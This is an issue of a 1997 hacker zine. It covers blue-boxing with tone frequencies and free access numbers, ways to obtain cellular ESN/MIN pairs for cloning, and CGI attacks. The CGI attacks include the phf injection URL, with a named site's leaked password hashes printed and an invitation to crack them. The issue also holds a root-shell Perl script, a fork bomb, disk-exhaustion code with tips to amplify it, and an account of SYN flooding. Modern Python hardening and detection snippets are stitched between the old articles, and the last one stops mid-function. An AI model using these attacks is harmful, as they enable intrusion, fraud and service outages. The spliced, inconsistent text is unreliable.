╒══════════════════════════════════════════════════════════════════╕
│ The HAVOC Technical Journal                                      │
└──────────────────────────────────────────────────────────────────┘

Vol. 1 | No. 8 | March 1st, 1997 | A HAVOC Bell Systems Publication
HBS: "we're ereet"
_____________________________________________________________________________

Inside this issue:

  What's new this issue..............................
  Editorial..........................................Scud-O
  Blue Boxing in France Pt. II.......................memor
  Fiber Optics.......................................Keystroke
  evilempire.org.....................................Scud-O
  Snarfing...........................................FuScAT
  CGI Insecurities Part III..........................Scud-O
  Denial Of Service Attacks..........................Scud-O
  The 'g0d' Project..................................Scud-O
  RTFM: UNIX Basics..................................
  HBS................................................
  Next Month.........................................

----------------------------------------------------
evilempire.org - the future of hbs - coming soon!
----------------------------------------------------

___________________________________________________________________

Editorial
by Scud-O

First off, I want to apologize for the poor quality of issue 7. I was worried that it would not be 100k, so I added some crap, and I know that I shouldn't have. This is NOT what you have or should come to expect from HBS, and from The HAVOC Technical Journal in particular. Anyway, next month KungFuFox is going to guest edit, and Keystroke and disc0re will help him collect articles and distribute them. I am going to be ram-rodding thtj down everyone's throat and getting more and more people to read thtj. This break from editing will allow me to get back on track with school and focus more, so that I can write better articles.
Issue 8 has gone fairly well. I am proud of it, and I think it is one of our greatest yet. However, only a few people contributed to it, so I have worked extra hard on my articles, especially the Denial Of Service article, which I feel is probably the best writing I've done so far. So read it and tell me what you think. This issue may even tie or beat issue 6 as our best issue ever.

I'll be getting the web page fixed up, adding the files page, getting Linux installed on my computer again, getting the ISP ready, raising funds for the ISP, getting my ICMP project done, and getting HBScript (aka mIRC HAVOC Bell Systems) version 1.0 done. Hopefully somewhere in there I'll still have time for a life and fun. Geez... just saying it all makes me tired....

[ASCII-art 'Scud-O' signature]
-of HAVOC Bell Systems-
"The eLiTe lammah!"
FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805

"You're Spiro Agnew and I'm the Dick you answer to."
- 'Boom', Bloodhound Gang with Rob Van Winkle

___________________________________________________________________

French Phreaking & Blueboxing
By memor

  1.1  *** French Phreakers' Politics
  1.11 Teletel Network In France
  1.12 Warez Business & Phreaking
  1.2  *** Types Of Phone Numbers In France
  1.21 Local & National Highly Dangerous Numbers
  1.22 0800 Dangerous Free Numbers
  1.23 080090xxxx & 080091xxxx Free BlueBoxing Numbers
  1.24 1800 & Operator Numbers

I --- French Phreaking & Blueboxing

1.1 *** French Phreakers' Politics

The French phreaking scene was mostly using lame calling cards. It was using them because now, with the Cartes Pastel (pastel cards), the calling card made by France Telecom, it is harder to fraud (361010), and the law is now really bad for carders, credit or calling. Blueboxing dudes are not hunted by the cops and/or France Telecom, so that has let us build up some little skills in blueboxing.
1.11 Teletel Network In France

Well, the first use of the bluebox was to get onto the Teletel network (explained in bif.txt). That 3615 network is really expensive and slow (1200 bps, V.23), so we had (when we were young) to use the bluebox to connect to it and stay on for really long times (like we do on IRC now). Personally I used it for connecting to 3615 RTEL, a server which was about computers, cracking and computer selling.

note: the NUA of RTEL is 020803506031801
      France____]\/[__________Server RTEL
      city named Rennes________|

RTEL is still alive; it uses videotex terminals (you can get one from ftp.minitel.fr or ftp.ibp.fr), and you must have a modem which knows V.23 (for a USR Sportster, V.23 is ATS34=8 ATZ).

1.12 Warez Business & Phreaking

The Paradox team (France) was using calling cards for accessing some BBSes in the USA and downloading Super Nintendo games and PC and Amiga warez. But their calling cards died, so they quickly learnt blueboxing to keep their business alive. They were blueboxing to the USA to download games and sell them in France. They all got busted.

1.2 *** Types Of Phone Numbers In France

1.21 Local & National Highly Dangerous Numbers

Local phone numbers are numbers where you must pay at the connection opening (0.73FF ... 5$US=1FF) and after that pay a tax per minute, like 0.23FF/min, so those phones are not really interesting for blueboxing because you still pay something. Well, maybe interesting for calling another country, but for calling somewhere in France, that's not interesting at all. National phone numbers are the same (0.73FF at connection opening), but after that you pay more.

Well, you want to bluebox on that phone number. OK, you are a good phreaker, you scan and you pass all the filters of the French system, and
you find frequencies like:

  Freq1 : voice1:2700 voice2:2650 length:130ms delay:10ms
  Freq2 : voice1:2570 voice2:2430 length:300ms delay:10ms

After that, you redial in France to call that hospital:

  Dial_Seq: A0380293031C
            local_]\/[___________________________Hospital number in Dijon

For calling the provinces, France is now divided into parts like:

  A01 <- Paris
  A02 <- Province (East of France)
  A03 <- South of France / Province

Well, you can call another country via a routing code:

  Dial_Seq: A001(USA PHONE NUMBER)C     A00 is for calling a foreign country

or via:

  Dial_Seq: B01(USA PHONE NUMBER)C      B is for an international call.

But if a company or someone you bluebox on asks France Telecom about a fraud, France Telecom keeps, for its local/national phone numbers, a big log (1 month of logging for each phone number), which looks like:

  Who Calls  <->  Who is Called  <->  Length  <->  Date / Time
  11111111    -   222222222       -   3Hours   -   25/12/96 / 00:00
  22222222    -   B01xblahxC      -   2H59Mn   -   25/12/96 / 00:01

11111111 is you, so you can be located. Be careful: those numbers are really dangerous.

1.22 0800 Dangerous Free Numbers

0800 numbers are free phone numbers in France. Same method for blueboxing on them as for French local/national phone numbers, but the same danger.

1.23 080090xxxx & 080091xxxx Free BlueBoxing Numbers

These ones are much more interesting, because they are free phone numbers but for calling other countries, like calling KornFlex (USA) from a 080090xxxx. With these ones you can call most countries, like Peru, Chile, USA, Canada (0800908026), UK, DE, ... Well, you can bluebox on them, but you must know the frequencies of the country. For example, Colombia:

  Freq1:2600 Freq2:2550 length:150ms delay:10ms
  Freq1:2400 Freq2:2350 length:300ms delay:10ms
  dial in CCITT#5 ...

Colombia is not really interesting, because you can only phone locally in Colombia. BxxxxC will suck; only AxxxxxC works, as long as you don't try to use a routing code. It will hang up to busy if you try that. No logs on those numbers.
1.24 1800 & Operator Numbers

1800 numbers are free for calling foreign countries' operators, and I know they are not logged, so it's "safe" to bluebox on them. I know some people who do that (Dominican Republic) from their home. We scanned Chile with a friend from home; well, the sure thing is that we are not busted, and we did that 1 month ago. The Dominican Republic number died 5-6 months ago.

Now some numbers for calling France Direct (a French operator) for free from your country:

  Argentina     0033800999111
  Australia     1800881330, 180055144 (ccs)
  Austria       022903033
  Belgium       080010033, 080010330
  Brasil        0008033
  Canada        18003634033, 18004636226 (ccs)
  Chili         123003331
  China         10833 (big cities only)
  Colombia (1)  980330057
  Colombia (2)  980330010 (ccs)
  Korea         0090330, 003933
  Denmark       80010033
  Dom. Rep.     18007510600
  EAU           8001133
  Finland       980010330
  Gabon         00033
  Germany       0130800033
  Greece        008003311
  Hawaii        18008653313
  HK            8000033, 80003311 (ccs)
  Hungary       0080003311
  Iceland       8009033
  Indonesia     001801331
  Ireland       1800551033, 1800550033 (ccs)
  Israel        1773302727
  Italy         1720033
  Japan (1)     0039331, 0031005533 (ccs)
  Japan (2)     004422333333 (ccs)
  Lux.          08000033 (ccs)
  Malaysia      8000033 (ccs)
  Morocco       002110033
  M.i.          73331
  Mexico        98800332001
  Norway        80019933
  New-Cal.      000933
  New-Zel.      000933
  UK (1)        0800890033
  UK (2)        0500890033 (ccs)
  Spain         900990033
  Sweden (1)    020799033
  Sweden (2)    020799133 (ccs)
  Uruguay       000433
  USA (1)       18005372623, 18009372623
  USA (2)       180047372623 (ccs), 18008727835 (ccs)
  USA (3)       18007278350 (ccs), 18002510841 (ccs)

___________________________________________________________________

Fiber Optics
by Keystroke

I explained the first main fiber optic project in my last article for HAVOC (the TAT-8). Here, I will try to give you a brief overview of fiber optic communications.

Fiber Optics Communications

Fiber optics communications, or lightwave communications. A typical fiber optics communications system consists of three basic components:

  1. Optical transmitter
  2. Optical fiber
  3. Optical receiver
  4. Havoc (Optional)

The transmission of information over a distance using optical fiber usually requires several steps. First, the info is converted into an electrical signal (if it is not already in that form). Second, the electrical signal is changed into an optical signal with the help of an optical source. Third, the optical signal is transmitted through the optical fiber. Fourth, the optical signal is detected and converted back into an electrical signal with the help of an optical detector. Finally, the signal processing is done.

Below are some more specific optical fibers, receivers, etc.:

  Electrical interface - electrical modulator, encoder, multiplexer, etc.
  Optical transmitter  - LED, laser diode
  Optical fiber        - monomode step-index fiber, multimode step-index fiber, multimode graded-index fiber
  Optical receiver     - PIN diode, APD, phototransistor, photo-Darlington
  Electrical interface - electrical demodulator, decoder, demultiplexer, etc.

Theoretically, an optical signal with a wavelength of 1 micrometer and a bandwidth of 300 THz is possible. Presently, the maximum bandwidth is only 10 Gbps :p

Monomode step-index is best for long-haul projects (less transmission loss), while multimode is better for short haul (more loss, but also more speed). There are 3 types of optical fiber: monomode step-index fiber, multimode step-index fiber, and multimode graded-index fiber.

There are many benefits of fiber optic communication:

  Large bandwidth - explained above
  Small size and weight - tens of micrometers, smaller than the diameter of a human hair, and MUCH smaller and lighter than copper (sic) cables
  Dielectric construction - no ground loops are required (no external electromagnetic fields)
  Low transmission loss - monomode fibers lose .2 dB/km, multimode 1 dB/km; not many repeaters necessary
  EMI & RFI immunity - no crosstalk, because there is no generation of electrical or electromagnetic noise or interference
  Signal security - optical fibers do not radiate energy. They can't be tapped in a non-intrusive manner. (Military and banks use them.)
  High reliability and durability - can't corrode, can't oxidize, can be used in explosive or nuclear environments

Now to compare optical sources:

  Property               LED                  Laser diode
  Spectral width         Large, 30-40 nm      Narrow, 1-2 nm
  Modulation bandwidth   1 Gbps               6-10 Gbps
  Insertion loss         10-15 dB             3 dB
  Output power           1-5 mW               5-15 mW
  Life expectancy        100 million hours    1 million hours
  Temperature            Tolerant             Sensitive
  Beam divergence        Large                Narrow
  Cost                   Low                  High

Optical detectors:

  Property               PIN (P-type, Intrinsic, N-type)   APD
  Sensitivity            Low                               High
  Cost                   Low                               High
  Temp. sensitivity      Tolerant                          Sensitive
  Bias voltage           Low (10-50 V)                     High (100-300 V)

As you can see, fiber optic communication is far superior to what is in use today in the majority of the world (copper wire).

- Keystroke

___________________________________________________________________

evilempire.org
--------------

  evilempire.org login
  HBS Unix 5.0 -=- linux kernel 1.3.20
  User:
  Password:

-------------------------------------

Imagine........

evilempire.org is to be the future of HBS, our up-and-coming ISP. We are currently filing for the domain with InterNIC, and plan for Defraz to run a simple vdomain for us until we get minos (the ISP computer) built. evilempire.org will start up with at least 2gb of space or so, and we will expand as we need to, and as funds allow. We plan for the computer to be co-located (basically this means at an ISP's building, with a T1 connection), but with a modem and a line for my internet access, and possibly psych0's if he pays me.

We will be offering accounts for a low fee, which will help us cover the cost of start-up (hopefully only about 1000$) and the monthly cost (about 300$ a month). As we get more and more users, accounts will get cheaper, as we will only be using the money to pay for the monthly fees and the costs to upgrade hardware, etc.
When we start, we will have 1gb of space for users, since about 1gb will be used for Linux and misc software, FTP files, newsgroups, etc. However, if we can piggyback off of the ISP that will host us, we may use their newsgroups and then offer more space to users.

We currently need at least 30 users to make this happen, so I am offering the following: the first 35 to 40 people that sign up, I will give you slashed prices on accounts when I have more people using the service, and will make your accounts free if I make enough to cover your accounts. And, as I gain users, I will start to offer different accounts; if people say they only want to run a bot or two on the account, I will lower the price.

As of 3-3-97, our pricing plan:
----------------------------------------------------
  $5/mo    email + newsgroups
  $10/mo   full shell
  $15/mo   secured shell *
  $5/mo    bot account only
  $10/yr   for each 10mb after the quota limit
  $15/yr   FTP account **

 * A secured account will offer more leniency if you use the server to run attacks on servers, etc. However, we WILL suspend your account if you abuse IRC and I get e-mails saying that if you do not stop, they will ban our domain. I AM NOT going to get evilempire.org banned from every IRC server out there!!!

** The FTP accounts will assure that you can get the files you need, since we plan to have a LARGE file collection, but only about 5 anonymous FTP logins at a time. All shell accounts come with this.

All shells come with: CGI-BIN, all UNIX stuff, many IRC progs, tons of DOS attackers, FTP access, mailbombers, permission to run bots, and about 20-50+ mb of space!
-------------------------------------------------------------------

We plan to get the server up by June or July, so send in the money soon if you want a premium account! E-mail me at FoxMulder@worldnet.att.net for more information, since our PO Box is not up yet.

  evilempire.org
  PO Box XXXX
  Sykesville, MD 21784

heh

computers:

  limbo: (current computer)
    486/66 (was a 50, pushed to 66)
    8 mb ram
    245 mb ide hd
    1 gb scsi hd
    2x cd-rom
    28.8 modem

  minos: (future computer at co-location)
    486/100
    16mb ram
    2 gb ide hd
    probably no cd drive
    28.8 modem (maybe)
    10mbps ethernet card connected to t1 line

  lucifer(?): (future computer at my house)
    pentium 200 (mmx?)
    32-64mb ram
    2-9gb hd (ide or scsi)
    8x-12x cd-rom
    28.8 modem
    10mbps ethernet (and another for limbo)

(After the site is up and we have money, we will upgrade to probably a Pentium 200 Pro or so, with 64-128 mb ram, several gigs hd, SCSI to support the hard drives, etc. Then maybe some day I will get a T1 right into the server and run it at my house! (not likely))

___________________________________________________________________

Gettin the Digits
by FuScAT

(*** ed note: although this article does not go as in-depth as I had hoped, it nonetheless gives you a good overview of 'snarfing' ***)

Basically we are dealing with the concern of obtaining Electronic Serial Numbers (ESNs) and Mobile Identification Numbers (MINs) for reprogramming cellular fones. Really there are about three basic ways to go about doing this that I am currently aware of. If you know of any others, please let me know about them.

First: Social Engineering

You could call up your cell provider and ask for a service man to come take a look at your fone. They will give you a name and say he will be there shortly. Then about 10 minutes later call the provider back pretending to be the service man they just sent out, and with the proper jargon and know-how you can squeeze the info out of them. Really not very effective, and frankly probably more of a waste of time...

Second: A CellScope

It's a fairly simple few pieces of hardware and software, consisting of a cellfone, a palmtop PC (or laptop), the proper software, and an antenna.
Basically the cellfone is used to scan the channels and frequencies of the cell sites; when a number in use is displayed on the screen by the software, you can lock in on it and the warez will snag the ESN & MIN for you, leaving it in plain English for you to use. VERY PRACTICAL but highly unaffordable (unfortunately, cus I'm sure we would ALL love to have one), and oh yea, only usable by law enforcement agencies or private detectives... (grin)

Finally: Modified Scanner

There is a way to modify a handheld police scanner to do virtually the same thing the CellScope's cellfone does. You can make a few (quite a few) modifications to your scanner to make it scan the cellular frequencies. Now you will also need the hardware for this, being the connector cable you will need to connect your scanner to your PC or laptop. Then with the right software and the know-how you will be able to snag ESNs & MINs.

If I am mistaken in any way PLEASE correct me... and if anyone knows of other ways to get the digits, please let us know...

--FuScAT

___________________________________________________________________

CGI Insecurities Part III
by Scud-O

----------------
NOTE: HBS brings it to you first! We started on CGI weaknesses in October; Phrack brought CGI weaknesses in December! (sorry, just had to gloat a little!)
----------------

Well, this is the final chapter in my three-part series on CGI Insecurities, and this will probably be the most useful part of the whole series, since you can use these holes in scripts that are out there running. This part of the article covers many topics, but it focuses mostly on shell escapes. Many CGI scripts (especially Perl scripts) use calls to UNIX commands (mostly sendmail or mail) to get simple services done.

Shell escapes:

Many, many, many CGI scripts are vulnerable, since they use mail, or even sendmail (what the hell is wrong with those CGI scripters? Don't they know that sendmail has holes?). Using, for example, ~ or other shell escape codes, it is possible to get a shell on the remote system to cause, heh, HAVOC! Sendmail is also a BIG hole here, since sendmail holes can be cracked and exploited through the CGI program.

system():

Another big weakness is the good old system call, which I presented in issue 6 (however, that was for C, but the basics are the same). If you find a system(), or even an exec() call, you can modify the HTML document: if you use Nutscrape (I'm not covering IE, since it is the devil!), click View, then Document Source, then change the CGI call to system("command_to_run") (command_to_run of course being the command you want to use), save the file, reload Nutscrape, and use it. Depending on how the CGI is coded, you might need to add the site's address here and there, but I will leave that to you.

fun:

Another way to get the password file is similar to the file I did way back in issue 4, but this is a hidden input tag (normally used to store information from page to page, much like 'cookies' do) which sends you an email with the passwords.

ex:

This then sends you the password file.

phf:
-----------

This bug is pretty common knowledge now, but basically you enter the following:

  http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

This then returns to you a copy of the password file. If you don't believe me that something like that could be so simple, try perrier.com. I got this when I tried:
--------------------------------------------------------------

Query Results

/usr/local/bin/ph -m alias=X /bin/cat /etc/passwd

root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:
nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
daemon:*:1:1:system background account:/:
bin:*:3:4:system librarian account:/bin:
uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:2:uucp adminstrative account:/usr/lib/uucp:
auth:*:6:11:Authentication Subsystem:/tcb/bin:
cron:*:7:14:Cron Subsystem:/usr/adm/cron:
lp:*:8:12:Line Printer Subsystem:/users/lp:
tcb:*:9:18:Trusted Computing Base:/tcb:
adm:*:10:19:Administration Subsystem:/usr/adm:
ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
locker:Nologin:12:15:locker:/usr/users/locker:/bin/sh
per-surv:Nologin:204:1:Perrier Survey Email address:/opt/per-surv:/bin/csh
calvert:Nologin:205:1:Calvert Deforest Email address:/opt/calvert:/bin/false
thebrains:Nologin:206:1:jrap Email address:/opt/jrap:/bin/false
jrap-surv:Nologin:207:1:jrap survey addr:/opt/jrap:/bin/csh
footlocker:Nologin:208:1:footlocker survey:/opt/footlocker:/bin/csh
ftp:*:500:25:Anonymous FTP user:/data/web/public/ftp:/bin/false
eds:RbaQ09DoC7MXg:501:26:EDS FTP user:/data/clients/eds:/bin/false
unprod:mD8.fz9LD.Tw6:210:32:unproductions FTP user:/data/web/public/calvert:/bin/false
bardhl:pm59ch9LkeaqY:211:33:Bardahl FTP User:/data/web/public/bardahl:/bin/false
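The listing above came from a CGI script that passed the URL-decoded query straight to a shell, so the encoded newline (%0a) ended the ph command and started /bin/cat as a second one. As an added example, not code from the article or from the phf script, here is that unsafe pattern next to a hardened lookup that validates the alias and hands an argument vector to the OS with no shell in between, plus a check a log reviewer can run over request paths to spot the same trick. The /usr/local/bin/ph -m alias= command line is taken from the output above; the alias character set (ALIAS_RE), the SUSPECT_RE metacharacter list and the function names are my assumptions, and nothing here executes ph.

```python
"""Shell-escape handling in a CGI lookup (constructed example, not from the article)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed character set for a directory alias: letters, digits, dot, dash, underscore.
ALIAS_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")
# Characters that change meaning inside a shell command line (assumed list).
SUSPECT_RE = re.compile(r"[\n\r;|&`$<>]")

PH = "/usr/local/bin/ph"     # command seen in the phf output above


def unsafe_command_line(raw_query_value):
    """What the naive script hands to /bin/sh: the decoded value spliced inline."""
    return PH + " -m alias=" + unquote(raw_query_value)


def shell_sees(command_line):
    """Split on newlines the way the shell does; each element is a separate command."""
    return [c.strip() for c in command_line.split("\n") if c.strip()]


def safe_argv(raw_query_value):
    """Hardened form: validate first, then build an argv list for execve-style
    execution (subprocess.run(argv) with no shell), never a shell string."""
    alias = unquote(raw_query_value)
    if not ALIAS_RE.match(alias):
        raise ValueError("rejected alias value: %r" % alias)
    return [PH, "-m", "alias=" + alias]


def is_rejected(raw_query_value):
    """True when safe_argv refuses the value."""
    try:
        safe_argv(raw_query_value)
    except ValueError:
        return True
    return False


def suspicious_request(path):
    """True when any decoded query parameter in a request path holds a line break
    or shell metacharacter; run this over the path column of an access log."""
    query = urlsplit(path).query
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(SUSPECT_RE.search(v) for v in values):
            return True
    return False


if __name__ == "__main__":
    attack = "x%0a/bin/cat%20/etc/passwd"          # the query from the URL above
    print("naive script runs:", shell_sees(unsafe_command_line(attack)))
    print("hardened script rejects it:", is_rejected(attack))
    print("hardened argv for a normal alias:", safe_argv("jsmith"))
    print("flagged in log:", suspicious_request("/cgi-bin/phf?Qalias=" + attack))
```

The fix that matters is the argv list: with no shell parsing the command line, a newline or semicolon is just bytes inside one argument. The validation on top keeps ph itself from seeing junk, and the log check gives you a way to find past requests that carried the injection before the script was fixed.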
Pretty slick, no? Anyway, have fun cracking their passwords..... one last thing....

--------------------------
exploit.pl

This script, while only 4 lines of code, gives you (or whoever runs this script) a shell to do, well, whatever you please.

#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
----------------------------------

I want to thank all of you for reading this, and I want to give thanks for the knowledge of CGI and its weaknesses, and thanks to memor for telling me to try out phf on perrier.com....

Scud-O

___________________________________________________________________

[The Modern Guide to Denial of Service Attacks]
History and Modern Uses
by Scud-O

Denial of Service (DOS) attacks are nothing new. Many old versions of UNIX would crash with this little bit of code if an administrator did not see all the processes running.

main()
{
    while(1)
        fork();
}

I remember crashing a few systems with this little prog, and a system will go down fast if this is not seen by an admin. Basically this program spawns (or forks) another process of itself, which then spawns more, and so on. This is a total attack, since all of the child processes are waiting for new processes to be established, so even if you kill one process, another will take its place. However, most current versions of UNIX are immune to this attack, since users are limited to a maximum number of processes (except root). Most UNIX versions have the max number of processes built into the kernel, but Solaris, for example, lets the value (MAXUPROC) be set at boot time, in /etc/system under set maxuproc=100 (or whatever the sysadmin has set it to be). However, if you have several accounts on a system, or have some friends with accounts, you all can take down the system by running the program.
Having too many processes is a great challenge for sysadmins to fix without having to reboot the system, since: a) you cannot run ps to determine what process numbers to kill, and b) if you are not logged in as superuser, you cannot use su or login, because both of these require the creation of a process, which, if your system is overloaded, is impossible. However, most sysadmins do not want to shut down their system by just flicking off the power, since virtually no systems are designed to undergo a fast, orderly shutdown when quickly powered off. And sysadmins know that hitting the power is not good for the disk, since it may lose disk blocks, and it will not flush the buffers to disk, thus losing any unsaved work. So admins are left to randomly killing processes, or, if their system supports it, doing a kill -TERM -1, which sends a SIGTERM to all processes except superuser processes and system processes.

________________
Disk Attacks:

Another old method of attack is the old disk attacks, such as filling up the hard disk, or tree structures, both presented below.

Hidden Space:

This is a form of attack that will work very well as long as the computer it is on runs 24 hours a day. Basically the sample bit of code below creates and keeps a file open, thus making it invisible to du or find, yet still taking up space. This is due to the fact that unlinked files are not in the directory tree, yet they still take up space.

filename: fillup.c

#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    int ifd;
    char buf[8192];

    /* create the file, then remove its directory entry while keeping it open */
    ifd = open("./attack", O_WRONLY | O_CREAT, 0777);
    unlink("./attack");
    while (1)
        write(ifd, buf, sizeof(buf));
}

This little program, after creating the file, runs an infinite loop which continues to fill up disk space, and stops anything from being worked on since the disk will be filled up. Try using ls or du to see the file and it will not be there, causing the sysadmin some confusion.
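To look at the per-user process cap from the admin's side, here is an added example that is not part of the article: it reads the RLIMIT_NPROC limit the current process runs under (the same value ulimit -u reports) and counts processes per user from ps -eo user= output, so a runaway account shows up before the machine stops being able to fork. The ps sample and the threshold of 4 are constructed for the demo; on a live system the script falls back to running ps itself.

```python
"""Per-user process accounting (constructed example, not from the article)."""
import resource
import subprocess
from collections import Counter

# Constructed 'ps -eo user=' output: one line per process, user name only.
SAMPLE_PS = """root
root
daemon
alice
alice
alice
bob
bob
bob
bob
bob
"""


def nproc_limit():
    """(soft, hard) RLIMIT_NPROC for this process. resource.RLIM_INFINITY
    means no cap at all, which is the situation the fork bomb relies on."""
    return resource.getrlimit(resource.RLIMIT_NPROC)


def count_by_user(ps_output):
    """Count processes per user from 'ps -eo user=' style text."""
    return Counter(line.strip() for line in ps_output.splitlines() if line.strip())


def over_threshold(counts, threshold, ignore=("root",)):
    """Users holding at least `threshold` processes, busiest first;
    system accounts in `ignore` are skipped."""
    hits = [(u, n) for u, n in counts.items() if n >= threshold and u not in ignore]
    return sorted(hits, key=lambda item: (-item[1], item[0]))


def live_ps_or_sample():
    """Use the real ps when available, otherwise the constructed sample."""
    try:
        return subprocess.run(["ps", "-eo", "user="], capture_output=True,
                              text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return SAMPLE_PS


if __name__ == "__main__":
    soft, hard = nproc_limit()
    print("RLIMIT_NPROC soft=%s hard=%s" % (soft, hard))
    for user, n in over_threshold(count_by_user(live_ps_or_sample()), 4):
        print("%-10s %d processes" % (user, n))
```

Note that a soft limit of RLIM_INFINITY on a multi-user box is exactly the condition the article's fork() loop needs; the point of the check is to catch that before someone else does.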
That is, unless they have a copy of lsof on hand, or they kill the process or all processes. Now, to make this go faster, always run this in the background, and then run a few more copies just for good measure.

* HINT: one way to get this to work faster is to add a fork() call in the program, thus making it run multiple copies and filling up the drive faster.

-----------------
Tree-structure attacks

These are actually quite lame and weak, but they can still cause some problems, since a tree could be made that is too deep to be deleted by rm. (HINT: for a very good attack, combine this and the attack above, to make a huge directory with huge files!)

A sample shell script that makes these directories and fills them up is below:

#!/bin/ksh
#
# Don't try this at home, unless you are quite foolish!
while mkdir anotherdir
do
    cd ./anotherdir
    cp /bin/cc fillup
done

On many systems rm -r just cannot delete trees this big, since they can overflow buffers or limits on the number of filenames or open directories at one time. Using chdir you can delete them manually, but this is quite boring, so most admins would just write a script to do this. (e-mail me if you need the script)

------------
/tmp

On many UNIX systems out there today, both users and programs can create files of unlimited size in the /tmp directory for temporary usage. Now, you can simply abuse this vulnerability by using the fillup.c or tree-structure progs above to fill up the /tmp dir and consequently fill up the entire disk.

------------------
Network Attacks:
------------------

Okay, you are probably saying, "hey great, I have these methods to attack a local system I have an account on, but what about remote systems that I may not have an account on?" Well, thanks to daemon9 and other coders out there, there is an abundance of remote DOS attacks. We are also lucky: to date no firewall really protects from a DOS attack, but watch that change soon.
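The unlinked-but-open trick behind fillup.c is easy to reproduce safely and easy to find. This added example (not the article's code) does a bounded write to a file it has already unlinked inside a temporary directory, shows that the name is gone while fstat still reports the size, and scans /proc/*/fd for link targets marked "(deleted)", which is the same information lsof reports for such files. The /proc layout is Linux-specific and the scan returns None elsewhere; the 64 KiB size and the "attack" file name are constructed.

```python
"""Unlinked-but-open files: reproduce and detect (constructed example, not from the article)."""
import os
import tempfile


def find_deleted_open_files():
    """Return [(pid, fd_link, target)] for open descriptors whose file was unlinked,
    or None when /proc is not available (non-Linux).  Descriptors of processes we
    are not allowed to inspect are skipped, so run as root for a full picture."""
    if not os.path.isdir("/proc"):
        return None
    found = []
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        fd_dir = "/proc/%s/fd" % pid
        try:
            fds = os.listdir(fd_dir)
        except OSError:                      # permission denied or process exited
            continue
        for fd in fds:
            link = os.path.join(fd_dir, fd)
            try:
                target = os.readlink(link)
            except OSError:
                continue
            if target.startswith("/") and target.endswith(" (deleted)"):
                found.append((int(pid), link, target))
    return found


def hidden_space_demo(nbytes=64 * 1024):
    """Create, unlink and keep writing to a file; report what each view of the
    system sees while the descriptor is open, then release it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "attack")             # constructed file name
        fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)
        real = os.path.realpath(path)
        os.unlink(path)                              # name gone, inode still alive
        buf = b"\0" * 8192
        written = 0
        while written < nbytes:                      # bounded, unlike fillup.c
            written += os.write(fd, buf[: nbytes - written])
        result = {
            "visible_in_dir": os.path.exists(path),  # False: ls/du/find see nothing
            "size_via_fstat": os.fstat(fd).st_size,  # but the blocks are still in use
            "listed_by_scan": None,
        }
        scan = find_deleted_open_files()
        if scan is not None:
            me = os.getpid()
            result["listed_by_scan"] = any(
                pid == me and target == real + " (deleted)" for pid, _, target in scan)
        os.close(fd)                                 # last reference dropped: space freed
        return result


if __name__ == "__main__":
    print(hidden_space_demo())
    hits = find_deleted_open_files()
    for pid, link, target in (hits or []):
        print(pid, link, "->", target)
```

The scan is what you reach for when df says the disk is full but du cannot account for it: every "(deleted)" target is space that comes back only when the holding process closes the descriptor or exits.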
With all the hype and press about DOS attacks on ISPs, firewalls will soon be able to block DOS. For daemon9's article on TCP/SYN flooding, either:

  a) go to http://www.geocities.com/SiliconValley/8805/files.html and scroll down to 'phrack' and click on issue 48
  b) go to http://freeside.com/phrack.html and scroll down to past issues and get issue 48
  c) or ftp.fc.net/pub/phrack/ and get phrack 48

You will want article 13, which is Project Neptune by daemon9. daemon9 gives a great in-depth analysis of TCP/SYN flooding and offers a great C program to attack systems. Now the basic info on TCP/SYN flooding presented here is nowhere near as informative as daemon9's, since I have not spent as much time on it as he has. What is below is a very simple explanation of the basics of the flood.

First, we need to see a simple connection. TCP uses a 3-way handshake to start up a conversation. ex:

  A                    B
  ---------> SYN
  <--------- SYN/ACK
  ---------> ACK

Now if A is the client computer and B is the host: A sends a SYN to B, and B replies with a SYN/ACK. This tells the client that the server acknowledges the connection, and then the client replies with an ACK, which says that it acknowledges the connection as well, and the connection is made. While a SYN is waiting to be processed, it sits in a backlog queue, waiting for the host to see it.

Here is where the flood comes in. Since UNIX creates a backlog to prevent several SYNs filling up the memory (which would make our job so much faster), we must fill up the queue. If you use a general IP spoofer (or the code in phrack 48), you can use it to make your connection appear to be coming from the spoofed IP, which MUST be unreachable so it cannot send a RST. Basically, the client sends a SYN to the host, the host tries to reply, but it sends it to the spoofed IP, and since that IP will not respond, it will continue trying to make a connection until it times out.
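A small model of the backlog just described, as an added example that is not part of the article: each SYN holds a half-open slot until the client's ACK completes the handshake, a RST from a reachable host frees it early, or the entry times out. Spoofed unreachable sources never send either, which is why the queue stays full for the whole timeout and real clients are refused; the same model shows why a spoofed address that does answer (with RST) does no harm. Capacity, timeout and the addresses are constructed values, and time is a counter passed in so the run is deterministic.

```python
"""Half-open connection queue model (constructed example, not from the article)."""
from collections import OrderedDict


class HalfOpenQueue:
    """Server-side backlog of connections that have received SYN/ACK but no ACK."""

    def __init__(self, capacity, timeout):
        self.capacity = capacity
        self.timeout = timeout
        self.pending = OrderedDict()   # (src_ip, src_port) -> time the SYN/ACK went out
        self.dropped = 0               # SYNs refused because every slot was taken
        self.completed = 0             # handshakes finished with a third-leg ACK

    def expire(self, now):
        """Give up on entries older than the timeout (host stops retrying SYN/ACK)."""
        for key, sent_at in list(self.pending.items()):
            if now - sent_at >= self.timeout:
                del self.pending[key]

    def on_syn(self, src, now):
        """SYN arrives: answer SYN/ACK and reserve a slot. Returns True if reserved."""
        self.expire(now)
        if src in self.pending:
            return True                # retransmit of a SYN we already hold
        if len(self.pending) >= self.capacity:
            self.dropped += 1
            return False               # queue full: the port looks dead to this client
        self.pending[src] = now
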